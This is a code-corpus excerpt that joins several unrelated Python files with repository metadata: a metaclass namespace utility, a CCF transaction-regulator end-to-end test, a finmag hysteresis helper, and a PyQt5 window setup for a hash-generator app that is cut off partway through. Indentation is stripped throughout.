# Adds attributes to namespace
cls.__namespaces__[name] = value
return cls
def setattr(self, name: str, value: object) -> None:
# Adds attributes to __magics__
if name.startswith("__") and name.endswith("__"):
self.__magics__[name] = value
# Adds attributes to other namespace
else:
# Adds attributes to __privates__
if name.startswith("__"):
self.__privates__[name] = value
# Adds attributes to __protecteds__
elif name.startswith("_"):
self.__protecteds__[name] = value
# Adds attributes to __publics__
else:
self.__publics__[name] = value
self.__attributes__[name] = value
# Adds attributes to namespace
self.__namespaces__[name] = value
# Object class
class Object(object, metaclass=Metaclass):
pass
# List class
class List(list, metaclass=Metaclass):
pass
# Dictionary class
class Dictionary(dict, metaclass=Metaclass):
def __getattr__(self, name: str) -> None:
try:
return self[name]
except KeyError as e:
try:
return super().__getattr__(name)
except AttributeError:
raise e
def __setattr__(self, name: str, value: object) -> None:
self[name] = value
# Recreating ABC
ABC = Metaclass(ABC.__name__, ABC.__bases__, {name: getattr(ABC, name) for name in dir(ABC)})
def get_namespaces(object: Object) -> Dictionary:
"""Gets the namespaces of an object."""
return object.__namespaces__
def get_magics(object: Object) -> Dictionary:
"""Gets the magic methods of an object."""
return object.__magics__
def get_attributes(object: Object) -> Dictionary:
"""Gets the attributes of an object."""
return object.__attributes__
def get_publics(object: Object) -> Dictionary:
"""Gets the public namespaces of an object."""
return object.__publics__
def get_privates(object: Object) -> Dictionary:
"""Gets the private namespaces of an object."""
return object.__privates__
def get_protecteds(object: Object) -> Dictionary:
"""Gets the protected namespaces of an object."""
return object.__protecteds__
# Initializing Systerm.module
from Systerm._setup import init_module
module = init_module()
# MetaMod class
class MetaMod(module.Module):
pass
module.modules[__name__].__class__ = MetaMod
| 3.765625 | 4 |
samples/apps/txregulator/tests/txregulatorclient.py | iqsarv/CCF | 1 | 1137 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import infra.e2e_args
import infra.ccf
import infra.jsonrpc
import logging
from time import gmtime, strftime
import csv
import random
from loguru import logger as LOG
class AppUser:
def __init__(self, network, name, country, curve):
self.name = name
self.country = country
primary, _ = network.find_primary()
network.create_users([self.name], curve)
network.consortium.add_users(primary, [self.name])
with primary.user_client(user_id=self.name) as client:
self.ccf_id = client.rpc("whoAmI", {}).result["caller_id"]
def __str__(self):
return f"{self.ccf_id} ({self.name})"
def run(args):
hosts = ["localhost"]
with infra.ccf.network(
hosts, args.build_dir, args.debug_nodes, args.perf_nodes, pdb=args.pdb
) as network:
check = infra.checker.Checker()
network.start_and_join(args)
primary, others = network.find_nodes()
script = "if tonumber(amt) > 200000 then return true else return false end"
if args.lua_script is not None:
data = []
with open(args.lua_script, "r") as f:
data = f.readlines()
script = "".join(data)
manager = AppUser(network, "manager", "GB", args.default_curve)
regulator = AppUser(network, "auditor", "GB", args.default_curve)
banks = [
AppUser(network, f"bank{country}", country, args.default_curve)
for country in ("US", "GB", "GR", "FR")
]
transactions = []
with open(args.datafile, newline="") as f:
datafile = csv.DictReader(f)
for i, row in enumerate(datafile):
# read first 10 lines
if i > 10:
break
json_tx = {
"src": row["origin"],
"dst": row["destination"],
"amt": row["amount"],
"type": row["type"],
"timestamp": strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime()),
"src_country": row["src_country"],
"dst_country": row["dst_country"],
}
transactions.append(json_tx)
# Manager is granted special privileges by members, which is later read by app to enforce access restrictions
proposal_result, error = network.consortium.propose(
0,
primary,
f"""
return Calls:call(
"set_user_data",
{{
user_id = {manager.ccf_id},
user_data = {{
privileges = {{
REGISTER_REGULATORS = true,
REGISTER_BANKS = true,
}}
}}
}}
)
""",
)
network.consortium.vote_using_majority(primary, proposal_result["id"])
# Check permissions are enforced
with primary.user_client(user_id=regulator.name) as c:
check(
c.rpc("REG_register", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
check(
c.rpc("BK_register", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
with primary.user_client(user_id=banks[0].name) as c:
check(
c.rpc("REG_register", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
check(
c.rpc("BK_register", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
# As permissioned manager, register regulator and banks
with primary.node_client() as mc:
check_commit = infra.checker.Checker(mc)
with primary.user_client(format="msgpack", user_id=manager.name) as c:
check(
c.rpc(
"REG_register",
{
"regulator_id": regulator.ccf_id,
"country": regulator.country,
"script": script,
},
),
result=regulator.ccf_id,
)
check(
c.rpc("REG_get", {"id": regulator.ccf_id}),
result=[regulator.country, script],
)
check(
c.rpc(
"BK_register",
{"bank_id": regulator.ccf_id, "country": regulator.country},
),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
LOG.debug(f"User {regulator} successfully registered as regulator")
for bank in banks:
check(
c.rpc(
"BK_register",
{"bank_id": bank.ccf_id, "country": bank.country},
),
result=bank.ccf_id,
)
check(c.rpc("BK_get", {"id": bank.ccf_id}), result=bank.country)
check(
c.rpc(
"REG_register",
{"regulator_id": bank.ccf_id, "country": bank.country},
),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
LOG.debug(f"User {bank} successfully registered as bank")
LOG.success(f"{1} regulator and {len(banks)} bank(s) successfully setup")
tx_id = 0 # Tracks how many transactions have been issued
# tracks flagged/non flagged and revealed/non revealed transactions for validation
flagged_txs = {}
revealed_tx_ids = []
flagged_ids = []
non_flagged_ids = []
flagged_amt = 200000
for i, bank in enumerate(banks):
with primary.user_client(format="msgpack", user_id=bank.name) as c:
# Destination account is the next one in the list of banks
for transaction in transactions:
print(transaction)
amount = transaction["amt"]
check(c.rpc("TX_record", transaction), result=tx_id)
check(
c.rpc("TX_get", {"tx_id": tx_id}),
result={
"amt": amount,
"bank_id": bank.ccf_id,
"dst": transaction["dst"],
"dst_country": transaction["dst_country"],
"src": transaction["src"],
"src_country": transaction["src_country"],
"timestamp": transaction["timestamp"],
"type": transaction["type"],
},
)
if float(amount) > flagged_amt:
check(
c.rpc("FLAGGED_TX_get", {"tx_id": tx_id}),
result=[regulator.ccf_id, False, transaction["timestamp"]],
)
flagged_tx = {
"amt": amount,
"bank_id": bank.ccf_id,
"dst": transaction["dst"],
"dst_country": transaction["dst_country"],
"src": transaction["src"],
"src_country": transaction["src_country"],
"timestamp": transaction["timestamp"],
"tx_id": tx_id,
"type": transaction["type"],
}
flagged_ids.append(tx_id)
flagged_txs[tx_id] = flagged_tx
else:
check(
c.rpc("FLAGGED_TX_get", {"tx_id": tx_id}),
error=lambda e: e is not None
and e["code"]
== infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
non_flagged_ids.append(tx_id)
tx_id += 1
LOG.success(f"{tx_id} transactions have been successfully issued")
# bank that issued first flagged transaction
with primary.user_client(format="msgpack", user_id=bank.name) as c:
# try to poll flagged but fail as you are not a regulator
check(
c.rpc("REG_poll_flagged", {}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_CALLER_ID.value,
)
# bank reveal some transactions that were flagged
for i, tx_id in enumerate(flagged_ids):
if i % 2 == 0:
check(c.rpc("TX_reveal", {"tx_id": tx_id}), result=True)
revealed_tx_ids.append(tx_id)
# bank try to reveal non flagged txs
for tx_id in non_flagged_ids:
check(
c.rpc("TX_reveal", {"tx_id": tx_id}),
error=lambda e: e is not None
and e["code"] == infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
# regulator poll for transactions that are flagged
with primary.node_client() as mc:
with primary.user_client(format="msgpack", user_id=regulator.name) as c:
# assert that the flagged txs that we poll for are correct
resp = c.rpc("REG_poll_flagged", {})
poll_flagged_ids = []
for poll_flagged in resp.result:
# poll flagged is a list [tx_id, regulator_id]
poll_flagged_ids.append(poll_flagged[0])
poll_flagged_ids.sort()
assert poll_flagged_ids == flagged_ids
for tx_id in flagged_ids:
# get from flagged txs, try to get the flagged one that was not revealed
if tx_id not in revealed_tx_ids:
check(
c.rpc("REG_get_revealed", {"tx_id": tx_id}),
error=lambda e: e is not None
and e["code"]
== infra.jsonrpc.ErrorCode.INVALID_PARAMS.value,
)
# get from flagged txs, try to get the flagged ones that were revealed
for tx_id in revealed_tx_ids:
check(
c.rpc("REG_get_revealed", {"tx_id": tx_id}),
result=flagged_txs[tx_id],
)
if __name__ == "__main__":
def add(parser):
parser.add_argument(
"--lua-script", help="Regulator checker loaded as lua script file", type=str
)
parser.add_argument(
"--datafile", help="Load an existing scenario file (csv)", type=str
)
args = infra.e2e_args.cli_args(add)
args.package = args.app_script and "libluageneric" or "liblogging"
run(args)
| 2.046875 | 2 |
src/finmag/sim/hysteresis.py | davidcortesortuno/finmag | 10 | 1138 | <reponame>davidcortesortuno/finmag
import os
import re
import glob
import logging
import textwrap
import fileinput
import numpy as np
from finmag.energies import Zeeman
from finmag.util.helpers import norm
log = logging.getLogger(name="finmag")
def hysteresis(sim, H_ext_list, fun=None, **kwargs):
"""
Set the applied field to the first value in `H_ext_list` (which should
be a list of external field vectors) and then call the relax() method.
When convergence is reached, the field is changed to the next one in
H_ext_list, and so on until all values in H_ext_list are exhausted.
Note: The fields in H_ext_list are applied *in addition to* any Zeeman
interactions that are already present in the simulation.
In particular, if only one external field should be present then
do not add any Zeeman interactions before calling this method.
If you would like to perform a certain action (e.g. save a VTK
snapshot of the magnetisation) at the end of each relaxation stage,
use the sim.schedule() command with the directive 'at_end=True' as
in the following example:
sim.schedule('save_vtk', at_end=True, ...)
sim.hysteresis(...)
*Arguments*
H_ext_list: list of 3-vectors
List of external fields, where each field can have any of
the forms accepted by Zeeman.__init__() (see its docstring
for more details).
fun: callable
The user can pass a function here (which should accept the
Simulation object as its only argument); this function is
called after each relaxation and determines the return
value (see below). For example, if
fun = (lambda sim: sim.m_average[0])
then the return value is a list of values representing the
average x-component of the magnetisation at the end of
each relaxation.
All other keyword arguments are passed on to the relax() method.
See its documentation for details.
*Return value*
If `fun` is not None then the return value is a list containing an
accumulation of all the return values of `fun` after each stage.
Otherwise the return value is None.
"""
if H_ext_list == []:
return
# Add a new Zeeman interaction, initialised to zero.
H = Zeeman((0, 0, 0))
sim.add(H)
# We keep track of the current stage of the hysteresis loop.
cur_stage = 0
num_stages = len(H_ext_list)
res = []
try:
while True:
H_cur = H_ext_list[cur_stage]
log.info(
"Entering hysteresis stage #{} ({} out of {}). Current field: "
"{}".format(cur_stage, cur_stage + 1, num_stages, H_cur))
H.set_value(H_cur)
sim.relax(**kwargs)
cur_stage += 1
if fun is not None:
retval = fun(sim)
res.append(retval)
log.debug("hysteresis callback function '{}' returned "
"value: {}".format(fun.__name__, retval))
except IndexError:
log.info("Hysteresis is finished.")
log.info("Removing the applied field used for hysteresis.")
sim.remove_interaction(H.name)
return res or None
def hysteresis_loop(sim, H_max, direction, N, **kwargs):
"""
Compute a hysteresis loop. This is a specialised convenience
version of the more general `hysteresis` method. It computes a
hysteresis loop where the external field is applied along a
single axis and changes magnitude from +H_max to -H_max and
back (using N steps in each direction).
The return value is a pair (H_vals, m_vals), where H_vals is
the list of field strengths at which a relaxation is performed
and m_vals is a list of scalar values containing, for each
field value, the averaged value of the magnetisation along the
axis `direction` (after relaxation has been reached). Thus the
command plot(H_vals, m_vals) could be used to plot the
hysteresis loop.
direction -- a vector indicating the direction of the
external field (will be normalised
automatically)
H_max -- maximum field strength
N -- number of data points to compute in each direction
(thus the total number of data points for the entire
loop will be 2*N-1)
kwargs -- any keyword argument accepted by the hysteresis() method
"""
d = np.array(direction)
H_dir = d / norm(d)
H_norms = list(np.linspace(H_max, -H_max, N)) + \
list(np.linspace(-H_max, H_max, N))
H_vals = [h * H_dir for h in H_norms]
m_avg = hysteresis(sim, H_vals, fun=lambda sim: sim.m_average, **kwargs)
# projected lengths of the averaged magnetisation values along the axis
# `H_dir`
m_vals = [np.dot(m, H_dir) for m in m_avg]
return (H_norms, m_vals)
| 2.6875 | 3 |
uiSetup.py | smokedpirate/Encryption-hash-generator | 4 | 1139 | <reponame>smokedpirate/Encryption-hash-generator<gh_stars>1-10
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5 import QtGui, QtCore
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(577, 341)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
MainWindow.setPalette(palette)
MainWindow.setAutoFillBackground(False)
MainWindow.setStyleSheet("background-color: rgb(84, 84, 84);")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.Algorithms = QtWidgets.QComboBox(self.centralwidget)
self.Algorithms.setGeometry(QtCore.QRect(190, 60, 191, 41))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.Algorithms.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Algorithms.setFont(font)
self.Algorithms.setStyleSheet("QComboBox {\n"
" color: #333;\n"
"\n"
" \n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" \n"
" }\n"
"\n"
"\n"
"QComboBox:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QComboBox:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"")
self.Algorithms.setObjectName("Algorithms")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Generate = QtWidgets.QPushButton(self.centralwidget)
self.Generate.setGeometry(QtCore.QRect(190, 120, 191, 41))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.Generate.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Generate.setFont(font)
self.Generate.setStyleSheet("QPushButton {\n"
" color: #333;\n"
"\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
